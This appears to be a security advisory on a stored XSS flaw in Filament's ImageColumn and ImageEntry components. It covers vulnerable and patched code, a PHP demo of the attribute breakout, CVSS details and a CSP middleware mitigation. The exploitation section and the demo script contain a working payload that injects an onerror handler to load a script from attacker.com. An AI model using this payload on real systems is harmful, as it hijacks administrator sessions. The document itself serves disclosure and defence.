Jun 24, 2026 · 5 min read
An HTML attribute injection vulnerability in Filament v4.x and v5.x allows authenticated users who can write to a database field rendered by an image component to inject arbitrary HTML attributes, including JavaScript event handlers, and execute code in the security context of administrators viewing the record.
Filament's ImageColumn (used in tables) and ImageEntry (used in infolists) components render database values inside HTML attributes without escaping them. This allows an attacker to inject arbitrary HTML attributes, leading to Stored Cross-Site Scripting (XSS).
Filament is a popular suite of full-stack components built for accelerated Laravel development. The framework provides declarative PHP classes to define database-backed interfaces, including interactive data tables and detail views (infolists). Key components of these systems are the ImageColumn and ImageEntry UI structures, designed to render image attributes dynamically.
During rendering, these components turn the stored state into HTML, specifically inline <img> tags whose src attribute is populated from the model's attribute value.
The root cause is the lack of escaping when the <img> tag is assembled. When an administrative user views a table or detail view containing a record that a low-privileged user has manipulated, the unescaped database value is emitted into the page and any injected event handler executes in the viewer's browser, a textbook Stored Cross-Site Scripting (XSS).
The underlying flaw is categorized as CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Specifically, it manifests as an attribute-injection vector. Inside the rendering lifecycle of both ImageColumn and ImageEntry, the component evaluates its visual state through a helper called toEmbeddedHtml().
During this execution, the method resolves the image source by calling $this->getImageUrl($stateItem). Prior to the patch, the returned value was merged into the component's extra image attribute bag and emitted as a raw HTML string; the attribute bag itself does not HTML-encode the values it renders.
Because the resolution engine assumed the database returned a clean URI string, it did not perform HTML entity encoding on the resulting value. If an attacker controls the database field mapped to the column (for instance, via a profile edit form or an API input), they can inject a double quote (") to break out of the src attribute context. This lets them define arbitrary HTML attributes, such as event handlers, which trigger script execution without requiring any explicit user interaction.
A detailed analysis of the fix commit (e1f36a7316d75476f3301e044cc360d7cb746c56) shows the exact remediation introduced by the maintainers. Below is a comparison of the vulnerable and patched code sections within the rendering pipeline.
Vulnerable code in the table/infolist components (excerpt):

```php
$formatState = function (mixed $stateItem) use ($defaultImageUrl, $width, $height, $shouldOpenUrlInNewTab): string {
    $item = '<img ' . $this->getExtraImgAttributeBag()
        ->merge([
            // Raw database state value merged directly without sanitization
            'src' => filled($stateItem) ? ($this->getImageUrl($stateItem) ?? $defaultImageUrl) : $defaultImageUrl,
            'x-tooltip' => filled($tooltip = $this->getTooltip($stateItem))
                ? '{
                    content: ' . Js::from($tooltip) . ',
```

Patched code in the table/infolist components (excerpt):

```php
$formatState = function (mixed $stateItem) use ($defaultImageUrl, $width, $height, $shouldOpenUrlInNewTab): string {
    $item = '<img ' . $this->getExtraImgAttributeBag()
        ->merge([
            // The state value is now wrapped in Laravel's e() escaping helper
            'src' => e(filled($stateItem) ? ($this->getImageUrl($stateItem) ?? $defaultImageUrl) : $defaultImageUrl),
            'x-tooltip' => filled($tooltip = $this->getTooltip($stateItem))
                ? '{
                    content: ' . Js::from($tooltip) . ',
```

The Laravel global helper e() runs PHP's native htmlspecialchars() with the ENT_QUOTES | ENT_SUBSTITUTE flags. This converts the characters that matter here, including the double quote ("), into HTML entities (&quot;), so the value can no longer terminate the src attribute and start another one.
Exploiting this flaw requires that an attacker have the ability to write a structured payload to a database field displayed in an ImageColumn or ImageEntry component.
An attacker changes their mapped record's image URL field to the following payload string:
data:image/png," onerror="let s=document.createElement('script');s.src='http://attacker.com/malicious.js';document.head.appendChild(s);
When a victim, typically an administrator with elevated privileges, opens the table or infolist that renders the record, the server emits the raw HTML with the broken attribute structure. The src value data:image/png, carries no image data, so the image fails to load and the browser fires the injected onerror handler, executing the JavaScript in the victim's session.
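The attribute breakout and the effect of the fix, reduced to a stand-alone script. This is an added example, not code from Filament or Laravel: renderAttributeBag() is a simplified stand-in for Laravel's ComponentAttributeBag that, like the real one, performs no HTML encoding of attribute values; escapeAttribute() reproduces what e() does with htmlspecialchars(); tagAttributes() parses the rendered tag with DOMDocument to show which attributes the browser would actually see. The payload is the one from this write-up; all function names are this example's own.

```php
<?php
declare(strict_types=1);

// Added example, not code from Filament or Laravel. Requires ext-dom (bundled
// with PHP by default). Run with: php image_attribute_breakout.php

// Simplified stand-in for Laravel's ComponentAttributeBag string rendering:
// values are placed between double quotes without HTML encoding, which is why
// the caller must escape them first.
function renderAttributeBag(array $attributes): string
{
    $parts = [];
    foreach ($attributes as $name => $value) {
        $parts[] = $name . '="' . $value . '"';
    }
    return implode(' ', $parts);
}

// What Laravel's e() helper does: htmlspecialchars() with ENT_QUOTES so both
// quote characters become entities, and ENT_SUBSTITUTE so invalid UTF-8 is
// replaced instead of producing an empty string.
function escapeAttribute(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Mirrors the shape of the 'src' => ... line in toEmbeddedHtml(): the stored
// state (or a default) becomes the src attribute, escaped only when $patched.
function buildImgTag(?string $storedState, string $defaultImageUrl, bool $patched): string
{
    $src = ($storedState !== null && $storedState !== '') ? $storedState : $defaultImageUrl;
    if ($patched) {
        $src = escapeAttribute($src);
    }
    return '<img ' . renderAttributeBag(['src' => $src, 'loading' => 'lazy']) . '>';
}

// Parses the rendered tag the way a browser would and returns the attribute
// names the <img> element actually carries. An attacker-chosen name such as
// onerror showing up here proves the stored value escaped the src attribute.
function tagAttributes(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    $img = $doc->getElementsByTagName('img')->item(0);
    if ($img === null) {
        return [];
    }
    $names = [];
    foreach ($img->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Constructed stored value: the payload from the write-up.
$payload = "data:image/png,\" onerror=\"let s=document.createElement('script');"
         . "s.src='http://attacker.com/malicious.js';document.head.appendChild(s);";

foreach (['vulnerable' => false, 'patched' => true] as $label => $patched) {
    $html = buildImgTag($payload, '/images/placeholder.png', $patched);
    $attrs = tagAttributes($html);
    $hasHandler = (bool) preg_grep('/^on/i', $attrs);

    echo str_pad($label, 11) . $html . PHP_EOL;
    echo str_pad('', 11) . 'attributes: ' . implode(', ', $attrs)
       . ($hasHandler ? '  <-- event handler injected' : '  <-- src intact') . PHP_EOL;
}
```

In the vulnerable run the parsed element carries src, onerror and loading; in the patched run the entire payload stays inside src as one escaped value and only src and loading remain. tagAttributes() is also a usable check for a rendered page: any on* attribute on an element whose attributes should come only from the application is a breakout.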
The CVSS v3.1 base score is 6.4 (Medium); the full vector is listed below. The metrics reflect a substantial risk to applications that use Filament dashboards for administrative management.
By leveraging Stored XSS, an attacker can target high-privilege administrators. The executed script runs inside the administrator's session and can act on their behalf, such as creating new user accounts with super-administrator access, extracting records through the panel, or modifying system configuration. Because these requests are issued by the victim's browser, an HttpOnly flag on the session cookie does not prevent them. The Scope metric is Changed (S:C) because the vulnerable component is the Filament application on the server while the impact is realized in a different security authority, the administrator's browser session.
At the time of this analysis, the EPSS score is low at 0.00148 (roughly a 0.15% estimated probability of exploitation in the wild over the next 30 days), and no public exploit has been reported. EPSS is a prediction rather than evidence of absence, so standard remediation is strongly advised, particularly where malicious insiders or compromised API tokens could write to the displayed fields.
The primary defensive measure is upgrading the application dependencies to safe versions of the Filament framework. For installations using Filament v4, upgrade to version 4.11.5 or higher. For Filament v5 installations, upgrade to version 5.6.5 or higher.
Additionally, review the local application tree for customized copies of the rendering logic. If developers have run php artisan vendor:publish to copy Filament views locally, or have extended ImageColumn or ImageEntry and overridden toEmbeddedHtml(), those files are not touched by the Composer upgrade and must be audited manually so that the resolved image URL passes through e() before it reaches the src attribute.
To limit immediate risk while planning updates, deploy a Content Security Policy whose script-src omits 'unsafe-inline' (which blocks the injected onerror handler) and restricts script sources to trusted hosts or nonces (which blocks the fetch from attacker.com). Filament relies on Alpine.js and Livewire, so test the policy in report-only mode first to find the inline expressions the panel itself needs.
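A Laravel middleware implementing that mitigation. This is an added example, not Filament's or Laravel's own code; the class name, the csp_nonce request attribute, the directive list and the report-only parameter are this example's choices.

```php
<?php
declare(strict_types=1);

namespace App\Http\Middleware;

use Closure;
use Illuminate\Http\Request;
use Illuminate\Support\Str;
use Symfony\Component\HttpFoundation\Response;

/**
 * Added example, not part of Filament or Laravel. Sends a Content-Security-Policy
 * header whose script-src has no 'unsafe-inline', so an injected onerror="..."
 * handler is refused by the browser, and whose allowed script origins exclude
 * arbitrary hosts such as attacker.com. Route usage: middleware('csp') to
 * enforce, middleware('csp:report-only') to observe violations first.
 */
class ContentSecurityPolicy
{
    public function handle(Request $request, Closure $next, string $mode = 'enforce'): Response
    {
        // Per-request nonce: the panel's own inline <script> tags may run once
        // they carry nonce="..." (the layout must be adapted to emit it); an
        // attacker cannot predict it, so their injected handler never matches.
        $nonce = Str::random(32);
        $request->attributes->set('csp_nonce', $nonce);

        $response = $next($request);

        $policy = implode('; ', [
            "default-src 'self'",
            "script-src 'self' 'nonce-{$nonce}'",
            "img-src 'self' data: blob: https:",
            "style-src 'self' 'unsafe-inline'",
            "connect-src 'self'",
            "object-src 'none'",
            "base-uri 'self'",
            "frame-ancestors 'self'",
        ]);

        // Report-Only reports violations to the console/report endpoint without
        // blocking; use it first because Alpine.js expressions in the panel may
        // need 'unsafe-eval' or further allowances that enforcement would break.
        $header = $mode === 'report-only'
            ? 'Content-Security-Policy-Report-Only'
            : 'Content-Security-Policy';
        $response->headers->set($header, $policy);

        return $response;
    }
}
```

Register the class under an alias such as csp and attach it to the panel, for example through the ->middleware([...]) call in the panel provider. Run it as report-only until the panel's own scripts and Alpine.js expressions produce no violations, then switch to enforcement; only the enforcing header actually stops the injected handler.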
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

| Product | Affected Versions | Fixed Version |
|---|---|---|
| filament/tables (Filament) | >= 4.0.0, < 4.11.5 | 4.11.5 |
| filament/tables (Filament) | >= 5.0.0, < 5.6.5 | 5.6.5 |
| filament/infolists (Filament) | >= 4.0.0, < 4.11.5 | 4.11.5 |
| filament/infolists (Filament) | >= 5.0.0, < 5.6.5 | 5.6.5 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-79 (Improper Neutralization of Input During Web Page Generation) |
| Attack Vector | Network / Low Privileges Required |
| CVSS v3.1 Score | 6.4 |
| EPSS Score | 0.00148 (0.15% probability) |
| Impact | Stored Cross-Site Scripting (XSS) |
| Exploit Status | No active public exploits |
The software does not neutralize or incorrectly neutralizes user-controlled input before it is placed in output that is used as a web page that is served to other users.